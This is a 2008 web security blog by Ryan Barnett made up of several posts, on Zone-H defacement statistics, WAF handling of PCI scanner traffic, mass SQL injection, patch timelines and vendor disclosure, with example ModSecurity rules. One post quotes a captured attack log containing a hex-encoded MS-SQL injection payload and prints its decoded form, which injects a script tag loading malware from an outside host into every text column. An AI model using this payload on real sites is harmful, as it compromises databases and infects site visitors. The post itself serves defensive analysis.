Friday, August 29, 2008

Lessons Learned from Zone-H Statistics Reports

Submitted by Ryan Barnett 8/29/2008

I may be in the minority in saying this, but I believe that web defacements are a serious problem and a critical barometer for estimating exploitable vulnerabilities in websites. Defacement statistics are valuable because they are one of the few types of incidents that are publicly visible and thus cannot easily be swept under the rug.

The reason I feel I am in the minority on this is that most people focus too much on the impact or outcome of these attacks (the defacement) rather than on the fact that their web applications are vulnerable to this level of exploitation. People are forgetting the standard risk equation -
RISK = THREAT x VULNERABILITY x IMPACT


The resulting risk of a web defacement might be low because the impact may not be deemed severe enough by a particular organization (for example, with threat and vulnerability both rated high but impact rated low, the product still comes out small). What most people are missing, however, is that the threat and vulnerability components of the equation still exist. What happens if the defacers decide not to simply alter some homepage content and instead do something more damaging? That is exactly what I believe is starting to happen. More on that later.

Zone-H Statistics Report for 2005-2007
Zone-H is a clearing house that has been tracking web defacements for a number of years. In March of 2008, they released a statistics report which correlated data from a three-year window (2005-2007). This report revealed some very interesting numbers.

What Attacks Were Being Used?
The first piece of data that interested me was the table listing the various attack methods that were successfully employed to gain enough system access to alter website content.

Attack Method | Total 2005 | Total 2006 | Total 2007
Attack against the administrator/user (password stealing/sniffing) | 48,006 | 207,323 | 141,660
Shares misconfiguration | 39,020 | 36,529 | 67,437
File Inclusion | 118,395 | 148,082 | 61,011
SQL Injection | 36,253 | 47,212 | 35,407
Access credentials through Man In the Middle attack | 20,427 | 21,209 | 28,046
Other Web Application bug | 50,383 | 6,529 | 18,048
FTP Server intrusion | 58,945 | 55,611 | 17,023
Web Server intrusion | 38,975 | 30,059 | 13,405
DNS attack through cache poisoning | 7,541 | 9,131 | 9,747
Other Server intrusion | 1,473 | 216,050 | 8,050
DNS attack through social engineering | 4,719 | 5,959 | 7,585
URL Poisoning | 2,897 | 7,988 | 6,931
Web Server external module intrusion | 8,487 | 17,290 | 6,690
Remote administrative panel access through bruteforcing | 2,738 | 4,988 | 6,607
Rerouting after attacking the Firewall | 988 | 4,308 | 6,127
SSH Server intrusion | 2,644 | 14,746 | 5,723
RPC Server intrusion | 1,821 | 5,793 | 5,516
Rerouting after attacking the Router | 1,520 | 4,867 | 5,257
Remote service password guessing | 939 | 7,008 | 5,105
Telnet Server intrusion | 1,863 | 6,252 | 4,753
Remote administrative panel access through password guessing | 1,014 | 4,416 | 4,753
Remote administrative panel access through social engineering | 780 | 5,472 | 3,127
Remote service password bruteforce | 3,576 | 4,018 | 3,125
Mail Server intrusion | 1,198 | 4,195 | 1,315
Not available | 11,382 | 3,724 | 39,724

Lesson Learned #1 - Web Security Goes Beyond Securing the Web Application Itself
The first concept that was reinforced is that the majority of attack vectors had absolutely nothing to do with the web application itself. The attackers exploited other services that were installed (such as FTP or SSH), or used DNS cache poisoning to give the "illusion" that the real website had been defaced. These defacement statistics should be a wake-up call for organizations to truly embrace defense-in-depth security and re-evaluate their network and host-level security posture.

Lesson Learned #2 - Vulnerability Statistics Don't Directly Equate to Attack Vectors used in Compromises
There are many community projects and resources available that track web vulnerabilities, such as Bugtraq, CVE, and OSVDB. These are tremendously useful tools for gauging the raw numbers of vulnerabilities that exist in public and commercial web software. Additionally, projects such as the WASC Web Application Security Statistics Project, or the statistics recently released by Whitehat Security, provide further information about vulnerabilities that are remotely exploitable in both public and custom code applications. All of this data helps to define both the overall attack surface available to attackers and the Vulnerability component of the RISK equation mentioned earlier. This information shows what COULD be exploited; for an actual incident, however, there must also be a threat (an attacker) and a desired outcome (such as a website defacement).

If an organization wants to prioritize which vulnerabilities to address first, one way to do this is to identify the vulnerabilities that are actually being exploited in real incidents. The data presented in the Zone-H reports helps to shed light on this area. Additionally, the WASC Web Hacking Incidents Database (WHID) includes similar data; however, it is solely focused on web application-specific attack vectors.


[Chart: Incident by attack method]


You may notice, for example, that although XSS is currently the most common vulnerability present in web applications, it is not the most frequently used attack vector. That distinction goes to SQL Injection. This makes sense if you think about it from the attacker's perspective. Which is easier -
  • Option #1
    • Identify an XSS vulnerability within a target website
    • Send the XSS code to the site
    • Either wait for a client to access the infected page, or try to entice someone to click a link on another site or in an email
    • Hope that your XSS code is able to grab the victim's session ID and send it to your cookie-trap URL
    • Quickly use that session ID to try to log into the victim's account
    • Try to steal sensitive info from the account
  • Option #2
    • Identify an SQL Injection vector in the web app
    • Send various injection variants until you fine-tune the attack
    • Extract the customer data directly from the back-end DB table
Option #2 is obviously much easier as it cuts out the middle-man (the client) and goes directly through the web app to get to the desired data. What I am seeing in the field while working with Breach Security customers is that attackers are focusing more and more on criminal activities that in some way, shape or form will help them get money. As Rod Tidwell so eloquently put it in the movie Jerry Maguire - Show Me The Money!

Lesson Learned #3 - Web Defacers Are Migrating To Installing Malicious Code
In keeping with the monetary theme from the previous section, another interesting trend is emerging with regards to web defacements. In all of the previous Zone-H reports, there was always a steady increase in the number of yearly defacements, averaging ~30% per year. In 2007, however, they recorded a significant 37% decrease, from 752,361 defacements in 2006 to 480,905. Obviously the number of targets is not going down, and the overall state of web application security is still pretty poor, so what could account for the drop?

It is my estimation that the professional criminal elements of cyberspace (Russian Business Network, etc...) have recruited web defacers into doing "contract" work. Essentially, the web defacers already have access to systems, so they have a service to offer. It used to be that the website data itself was the only thing of value; now, however, we are seeing that using legitimate websites as a malware hosting platform provides massive scale improvements for infecting users. So, instead of overtly altering website content and proclaiming their 3l33t hzx0r ski77z to the world, they are rather quietly adding malicious JavaScript code to the sites and are making money from criminal organizations and/or malware advertisers by infecting home computer users.

Take a look at the following chart from the WHID Report -

Attack Goal                    | %
Stealing Sensitive Information | 42%
Defacement                     | 23%
Planting Malware               | 15%
Unknown                        | 8%
Deceit                         | 3%
Blackmail                      | 3%
Link Spam                      | 3%
Worm                           | 1%
Phishing                       | 1%
Information Warfare            | 1%

[Chart: Incident by outcome]

You can see that Defacement accounts for 23% of incidents, while Planting Malware is right behind it at 15%. It is my opinion that the majority of people who are executing defacements will continue to migrate over and start installing malware in order to make money. This is one of the only plausible explanations I have to account for the dramatic decrease in the number of defacements.
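For site owners worried that their own pages are being quietly used as a malware distribution point, outbound monitoring on a WAF is one way to spot it. The following is only a rough sketch (the domain is a placeholder and the rule is illustrative, not a tested signature) of a ModSecurity configuration that inspects response bodies for injected script references -

SecResponseBodyAccess On
# Sketch only: flag outbound pages that reference a script hosted on a domain
# you have identified as serving malware (malware.example.net is a placeholder).
SecRule RESPONSE_BODY "@rx <script\s+src=[^>]*malware\.example\.net" \
    "phase:4,t:none,deny,log,msg:'Response contains script reference to suspected malware domain'"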

What is somewhat humorous about this trend is that I actually mentioned the concept of defacers making "non-apparent" changes to site content in my Preventing Web Site Defacements presentation way back in 2000. Looks like I was about 8 years ahead of the curve on that one :)

Wednesday, August 27, 2008

More PCI Confusion: How Should WAFs Handle ASV Traffic?

Submitted by Ryan Barnett 8/27/2008

I have previously discussed the importance of sharing data between code reviews, vulnerability scanning and web application firewalls. The main issue is that these three processes/tools are usually run by three different business units - development, information security and operations staff - and they don't all share their output data with each other. The issue of sharing output data, however, is putting the cart before the horse. When looking at vulnerability scanning, you need to first decide what the goal of scanning is, and then you can select the appropriate WAF configuration for handling the traffic.

What is the ASV Scanning Goal?
There seem to be two different goals that ASVs may have for scanning: 1) to identify all vulnerabilities within a target web application, or 2) to identify all vulnerabilities within a target web application that are remotely exploitable by an external attacker. You may want to read that again to make sure you understand the difference, as this is the point I will be discussing for the remainder of this post.

Identifying Underlying Vulnerabilities
This is a critical goal to have when scanning. If you can identify all of the existing vulnerabilities, or at least those which can be identified by scanning, you can then formulate a remediation plan to address the issue at the root cause. Remediation should include both source code fixes and custom rules within a WAF for protection in the interim.

WAF Event Management
From a WAF administration perspective, it is important to have a configuration that allows for the vulnerability scanning goal while not flooding the alert interfaces with thousands of events from ASV traffic. This data may impact the overall performance of the WAF, and it may skew reporting outputs that include raw attack data.

Option #1 - Whitelist the ASV Network Range
In order to identify all of the actual vulnerabilities, you will need to allow the ASV to interact completely with the back-end web application.

Pro(s)
  • Identification of vulnerabilities and information leakages within the web application
  • From a WAF event management perspective, this configuration will eliminate alerts generated by the scans
Con(s)
  • Reduces the real-world accuracy of the scans, as they do not simulate what a “normal” attacker would be able to access: the WAF is not blocking inbound attacks or outbound information leakages (such as SQL Injection error messages) which attackers use to fine-tune their attacks.
  • PCI QSAs may interpret these scan results in a negative way if the WAF blocking aspect is not considered as a compensating control in Requirement 6.6.
Option #2 - Treat ASV Traffic Like Any Other Client
Pro(s)
  • Gives a truer picture of what an attacker would/wouldn’t be able to exploit since the WAF is providing its normal protections.
Con(s)
  • Vulnerabilities within the web application may not be identified and therefore are not remediated through other means.
  • This configuration will generate tons of alerts, especially if the scan frequency is high (e.g., daily).
Option #3 - Run Before and After Scans
If you coordinate with your ASV, you could conduct 2 different scans – one when the ASV range is whitelisted and one without.

Pro(s)
  • It allows for the identification of vulnerabilities.
  • This is advantageous as it shows the immediate ROI of a WAF as a compensating control for PCI.
Con(s)
  • If you take this approach, be aware that you need to make sure your QSA knows about both scans and does NOT look only at the whitelisted scan data.
Option #4 - Use a Block but Don't Log Configuration for ASVs
One other option you might want to consider is a “block but don't log” configuration, a hybrid approach that is suitable for day-to-day use. With this setup, the WAF still blocks requests/responses when it sees attacks, but it inspects the source IP address and, if the traffic is coming from an ASV, it does not generate alerts. To me, this is the best approach for day-to-day scanning, as anything that shows up in the ASV scan reports is something that the WAF did not block and should be addressed.
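To make Options #1 and #4 a bit more concrete, here is a rough ModSecurity-style sketch. The 203.0.113.x range is only a placeholder for an ASV's published source addresses, you would deploy one rule or the other (not both), and the Option #4 rule is only an approximation of "block but don't log" - it leaves the blocking rules active while suppressing audit logging for ASV transactions -

# Option #1 - whitelist the ASV range: no inspection, no blocking, no alerts.
SecRule REMOTE_ADDR "@rx ^203\.0\.113\." \
    "phase:1,t:none,nolog,allow,ctl:ruleEngine=Off"

# Option #4 (approximation) - keep the rule engine, and therefore blocking,
# enabled, but turn off audit logging for transactions from the ASV range.
SecRule REMOTE_ADDR "@rx ^203\.0\.113\." \
    "phase:1,t:none,nolog,pass,ctl:auditEngine=Off"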

Some ASVs Are Arguing That a WAF Shouldn't Ever Block Them
I have run into an interesting webappsec scenario while presenting on PCI at conferences (such as the recent SANS What Works in Web Application Security Summit in Vegas). The attendees have started complaining that many ASVs are requiring that organizations only use the whitelist approach so that the vulnerability scans will pass directly through the WAF and interact with the back-end web application unencumbered. The ASVs are citing the following section in the PCI Security Scanning Procedures document -

13. Arrangements must be made to configure the intrusion detection system/intrusion prevention system (IDS/IPS) to accept the originating IP address of the ASV. If this is not possible, the scan should be originated in a location that prevents IDS/IPS interference

Obviously, these ASVs are lumping WAFs in with network IDS/IPS devices in this context. In reading this section, it seems to me that the real intent of this requirement is that organizations should not "cheat" and configure these devices to automatically block or disrupt (with TCP resets) connections coming from the ASV range based SOLELY on the IP address, which would not allow the scanner to inspect the site at all. Basically, you cannot blacklist the ASV IP range. This makes sense, as that configuration would make the vulnerability scan reports come up clean, but it would not be a realistic picture of what a real attacker would be able to access.

What About VA + WAF Integration?

What is frustrating about this whitelisting hard-line stance is that it effectively negates the valuable Vulnerability Assessment + WAF integration efforts that have recently appeared - most notably between Breach and Whitehat Security. If a WAF is not allowed to block requests coming from an ASV, then how are the ASV reports ever going to show that an issue has been remediated by a virtual patch?

Look at the following sections for PCI Requirement 11.2

11.2 Run internal and external network vulnerability scans at least quarterly and after any significant change in the network (such as new system component installations, changes in network topology, firewall rule modifications, product upgrades).

Note: Quarterly external vulnerability scans must be performed by a scan vendor qualified by the payment card industry. Scans conducted after network changes may be performed by the company’s internal staff.

11.2.a Inspect output from the most recent four quarters of network, host, and application vulnerability scans to verify that periodic security testing of the devices within the cardholder environment occurs.

Verify that the scan process includes rescans until “clean” results are obtained


11.2.b To verify that external scanning is occurring on a quarterly basis in accordance with the PCI Security Scanning Procedures, inspect output from the four most recent quarters of external vulnerability scans to verify that

• Four quarterly scans occurred in the most recent 12-month period

• The results of each scan satisfy the PCI Security Scanning Procedures (for example, no urgent, critical, or high vulnerabilities)

• The scans were completed by a vendor approved to perform the PCI Security Scanning Procedures

Notice the sections above about rescanning until “clean” results are obtained and about no urgent, critical, or high vulnerabilities. The problem that organizations are encountering is that if they do whitelist the ASV IP addresses, the resulting scan reports will show vulnerabilities that a real attacker would most likely not be able to exploit, because the WAF would be blocking those attacks or a virtual patch has been implemented. So, if a QSA looks at the ASV scans and sees a bunch of urgent/critical/high vulns (SQL Injection, XSS, etc…), then the organization may fail this section. :(

Clarifications Needed

I believe that the PCI Security Council needs to update the text in the ASV Scanning Procedures guide to make it clearer how WAFs should be configured in relation to PCI scanning. At the very least, they should clarify the original intent of that text (as stated previously, I believe it was to prevent sites from blacklisting the ASV address ranges).

I am interested in hearing people's experiences with this situation. What have ASVs told you? How do you configure your WAFs to handle ASV traffic?

Tuesday, August 26, 2008

Mass SQL Injection Attacks Now Targeting PHP Sites

Submitted by Ryan Barnett 8/26/2008

As most of you already have heard, or have faced yourselves, the mass SQL Injection attacks are still going strong on the web - Mass SQL Attack a Wake-up Call for Developers.

The Game Has Changed
Previously, criminals had a tough time creating scripts that would mass-exploit web applications, mainly because websites run custom-coded apps: no two sites are the same. Attackers didn't have access to the target code, so if they wanted to extract customer credit card data from a back-end database, they were forced to conduct manual reconnaissance probes to enumerate the database structure and naming conventions (such as in the previous real attack). This manual probing gave defenders time to identify and react to attacks before customer data was successfully compromised.

Now, these SQL Injection scripts can generically inject data into any vulnerable site without prior knowledge of the database structure. They accomplish this by using multiple SQL commands to essentially create a script that gathers and loops through all table and column names and appends malicious JavaScript that points to malware on a third-party site.

A "skeleton key" attack if you will. Brutal...

The attacks have mainly been targeting IIS/ASP/MS-SQL sites up to this point. For example, I recently received this example attack log from a ModSecurity user which shows the SQL Injection payload -
GET /somedir/somfile.asp?arg1=SOMETHING;DECLARE%20@S%20
VARCHAR(4000);SET%20@S=CAST(0x4445434c41524520405420
5641524348415228323535292c4043205641524348415228323535
29204445434c415245205461626c655f437572736f722043555253
4f5220464f522053454c45435420612e6e616d652c622e6e616d652
046524f4d207379736f626a6563747320612c737973636f6c756d6
e73206220574845524520612e69643d622e696420414e4420612e
78747970653d27752720414e442028622e78747970653d393920
4f5220622e78747970653d3335204f5220622e78747970653d323
331204f5220622e78747970653d31363729204f50454e205461626
c655f437572736f72204645544348204e4558542046524f4d20546
1626c655f437572736f7220494e544f2040542c4043205748494c4
528404046455443485f5354415455533d302920424547494e20455
845432827555044415445205b272b40542b275d20534554205b27
2b40432b275d3d525452494d28434f4e56455254285641524348415
22834303030292c5b272b40432b275d29292b27273c7363726970
74207372633d73646f2e313030306d672e636e2f63737273732f77
2e6a733e3c2f7363726970743e27272729204645544348204e4558
542046524f4d205461626c655f437572736f7220494e544f2040542
c404320454e4420434c4f5345205461626c655f437572736f722044
45414c4c4f43415445205461626c655f437572736f7220%20AS%20
VARCHAR(4000));EXEC(@S);-- HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Accept-Language: en-US
Accept-Encoding: deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: www.example.com
Connection: Close
If we decode the HEX encoded SQL data, we get this -
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
  SELECT a.name,b.name FROM sysobjects a,syscolumns b
  WHERE a.id=b.id AND a.xtype='u'
    AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=sdo.1000mg.cn/csrss/w.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
Fortunately for this user, ModSecurity has rules that easily detected and blocked this attack.
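For reference, a generic rule for this style of payload might look something like the following. This is only an illustrative sketch, not the actual ModSecurity rule that blocked the attack above -

# Sketch only: look for the telltale DECLARE/CAST(0x...)/EXEC(@...) patterns
# used by these mass SQL Injection scripts, after decoding the request data.
SecRule REQUEST_URI|ARGS "@rx (?i:declare\s+@\w+\s+n?varchar\s*\(|cast\s*\(\s*0x[0-9a-f]{8,}|exec\s*\(\s*@\w+\s*\))" \
    "phase:2,t:none,t:urlDecodeUni,t:compressWhitespace,deny,status:403,log,msg:'Possible mass SQL Injection (hex-encoded CAST/EXEC payload)'"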

The theory is that the SQL injection code could be updated to compromise other platforms such as PHP, etc... Well, I have been doing some research, and I am finding evidence of PHP sites that have been infected. For example, if you do a Google search looking for PHP sites that contain the same JavaScript code as the example that was sent to me, you will see that approximately 3,150 PHP sites are currently infected.
Technical Sidenote - what is interesting with these PHP sites is that even though their web applications are not filtering client input and their DB queries are not secure, they actually blunt the goal of this attack, since the PHP code is properly HTML-encoding the output sent to clients, so the injected <script> tag is rendered as harmless text :)
What I am not sure of is whether the attack code itself has indeed changed (to target other back-end DBs) or if the victim site is using a PHP front-end with an MS-SQL back-end… If you have any logs of these attacks where they are targeting PHP pages (instead of ASP/ASPX), please share them with me or post them here.

Monday, August 25, 2008

On Your Marks, Get Set, Go: Vulnerability Mitigation Race

Submitted by Ryan Barnett 8/25/2008

Now that the 2008 Olympics have drawn to a close, I wanted to post this entry as the track and field events inspired this analogy.

In many ways, vulnerability remediation is like a track and field race in which the firing of the starter's pistol is the public vulnerability announcement. The goal of the race is to be the first to either exploit or patch the vulnerability. The participants in the race may include:

1) Organizations running the vulnerable application,

2) Attackers looking to exploit the vulnerability manually, and

3) The odds-on favorite to win the race - an automated worm program.

Organizations looking to mitigate or patch their systems are the long shots to win this race. Let's look at a breakdown of the challenges that organizations face:

Not Hearing the Starter's Pistol

Unfortunately, many organizations don't realize that they are even in a race! This can be attributed to poor monitoring of vulnerability alerts. If you aren't signed up for your vendor's mailing list, or you don't have someone checking US-CERT or the SANS Internet Storm Center (ISC) daily, then you are immediately giving the attackers a 50-yard lead in this race...

What Do You Mean We Don't Have The Baton?

If you are running in a relay race, you need a baton to pass to each member of your team. In this case, the baton is the vendor's security patch. You might be ready, willing, and able to start the patching process; however, if the vendor doesn't release a patch, you can't really start the race, can you?

Not Getting A Clean Handoff

Each leg of the relay can be thought of as a step in the patching process: installation on a test host, then pushing the patch out to development, then regression testing, and finally out to production. As each phase completes its tasks, it needs to notify the next group and "hand off the baton" so they can move forward with testing. If this doesn't happen, the patch will never make it to the finish line - which is when the patch is applied to production hosts. I can't tell you how many times I have seen customers whose patches make it through one or two phases but then just seem to fall off the priority list.

Getting Disqualified

In a relay race, if you step outside of your lane, you can be disqualified. Similarly, if a security patch causes any sort of disruption to normal service, the patch is usually not applied. If there are problems during regression testing, odds are that the security patch will not make it to the finish line. In the end, functionality will always trump security.

Let's Not Pull A Hamstring

Many organizations want to minimize the chance of being disqualified, so they take a slow, methodical approach to the race and decide just to walk it. These are the organizations that only have quarterly downtime windows for patching. These companies may get a ribbon for participation, but they will never win the race.

Don't Have A Lane To Run In

What happens if you are not able to apply any patches at all to your web application? Two common scenarios are companies that have outsourced the development of their web application and those using an older version of a COTS product for which the vendor no longer provides patches. What options are left for these companies to compete in this race?

Evening The Odds

So, where does that leave us? Is there anything that organizations can do to even the playing field in this race? The answer is yes. Virtual patching can help by providing an immediate mitigation for the vulnerability. If an organization implements a virtual patch on a web application firewall, it acts as a stop-gap measure to prevent remote exploitation of the vulnerability until the actual patch is applied. Using the relay race analogy again, this would be like forcing the attackers to run a steeplechase-type race with water pits and 10-ft. hurdles in their lane while you are allowed to run a normal race without any obstacles. In this type of scenario, you have a much better chance of beating the attackers to the finish line and protecting your web applications.
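To illustrate what a virtual patch can look like in practice, here is a minimal sketch in the ModSecurity rules language. The resource and parameter names are purely hypothetical; the idea is simply to enforce at the WAF the input constraint that the vulnerable code fails to enforce, until the real patch is applied -

# Hypothetical example: an advisory reports that the "id" parameter of
# /app/report.jsp is injectable and no vendor patch is available yet.
# Constrain the parameter to the only format the application should accept.
<LocationMatch "^/app/report\.jsp$">
    SecRule ARGS:id "!@rx ^\d{1,10}$" \
        "phase:2,t:none,deny,status:403,log,msg:'Virtual patch: invalid id parameter'"
</LocationMatch>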

Wednesday, August 6, 2008

Microsoft and Oracle Helping "Time-to-Fix" Problems

Submitted by Ryan Barnett 8/6/2008

Before I get to the title of this post, I have to provide a little back story. I have had an ongoing DRAFT blog post whose subject was basically a rant against many vendors who were unwilling to offer vulnerability details. Every now and then I would review and update it a bit, but I never got to the point of actually posting it. I figured it wouldn't do much good in the grand scheme of things, and the mere act of updating it provided adequate cathartic relief that a public post was not required. There have been some recent developments, however, that have allowed me to dust off my post and put a "kudos" spin on it :)

I have long been a proponent of providing options for people to mitigate identified vulnerabilities. We all realize that the traditional software patching process takes way too long to complete and push out into production, considering that the time it takes for the bad guys to create worm-able exploit code is usually measured in days. When you combine this with most vendors' vulnerability disclosure policies (which are essentially not to disclose any details), it is obvious that the bad guys have a distinct advantage in this particular arms race...

Ideally, all vulnerability researchers would work with the vendor, details would be released jointly with patches, and customers would immediately implement them on production hosts. Unfortunately, reality is much different. Researchers often have their own agendas and decide to release vulnerability details on their own. In these cases, the end users have no mitigation options provided by the vendor and are thus exposed to attacks. For those situations where the researchers and the vendor do work together, the end user at least has a fix that they can apply. The problem is that the standard time-to-fix for organizations to test and install patches is usually a couple of months. So, the vendor has pushed the pig over the fence onto the customer and essentially takes an "it's your problem now" approach.

What would be useful is some technical detail on the vulnerabilities that are addressed within the patches. Let's take a look at Oracle's position on public disclosure. The fact that this is Oracle is irrelevant, as many vendors share the same view: they don't want to disclose any technical details of a vulnerability BEFORE patches are released. I really can't fault them for this stance, as they want to ensure that they have patches ready. What I am focusing on here is that when they have a patch set ready, they should provide enough technical detail about the vulnerability so that an organization can implement some other mitigation options until the actual patches are installed. Unfortunately, the vendors' position is that they don't want to release the details, so as to prevent the bad guys from obtaining the info. What they are missing, however, is that both the good guys (Sourcefire, iDefense, etc...) and the bad guys are reverse engineering the vendors' patches to uncover the details of the vulnerability. The only people who don't have any details are the end users.

So the point is that Pandora's box is already open once vendors release patches. What they should do, then, is give enough technical detail for security folks to implement some defenses (for IDSs/IPSs, for example). A great example of this is the Bleeding Edge/Emerging Threats folks creating Snort signatures so that an organization can identify whether someone is attempting to exploit a flaw.

Now, the whole point of this post is to highlight that I have been fighting the good fight with many vendors to try to get them to see the light on the value of either releasing technical details on web-based vulnerabilities so that end users can create virtual patches with a web application firewall, or even better, releasing some virtual patches themselves (using the ModSecurity rules language). Well, we haven't achieved the latter yet, but we are seeing signs that both Oracle and Microsoft are starting to address the former. Specifically, Oracle/BEA recently released details about a WebLogic plug-in for Apache, and in the mitigation section they actually mentioned the use of ModSecurity to address the problem! That is a huge step and something that I am extremely excited about. Then, just within the last week, we saw the announcement of Microsoft's Active Protections Program (MAPP). Here is the short overview -

The Microsoft Active Protections Program (MAPP) is a new program that will provide vulnerability information to security software providers in advance of Microsoft Corp.’s monthly security update release. By receiving vulnerability information earlier, security software providers can give customers potential improvements to provide security protection features, such as third-party intrusion detection systems, intrusion prevention systems or security software signatures.
This is certainly an interesting initiative and may help organizations to receive more timely mitigation options to help protect themselves until the official patches are deployed.
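To give a feel for the kind of stop-gap this sort of early guidance enables, consider a purely hypothetical advisory stating that a web server plug-in flaw is triggered by overly long request URIs. The following is not the actual rule from the Oracle/BEA advisory or anything released under MAPP - it is only a sketch of what a defender could deploy the same day such details are published -

# Hypothetical stop-gap: cap request URI length for the affected application
# until the patched plug-in can be rolled out. The 2000-character threshold
# is illustrative and would need to be tuned to legitimate traffic.
SecRule REQUEST_URI "@rx ^.{2000,}" \
    "phase:1,t:none,deny,status:403,log,msg:'Request URI exceeds expected maximum length'"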

Overall, I have to say GREAT job, Oracle and Microsoft, for truly helping your customers close their time-to-fix windows.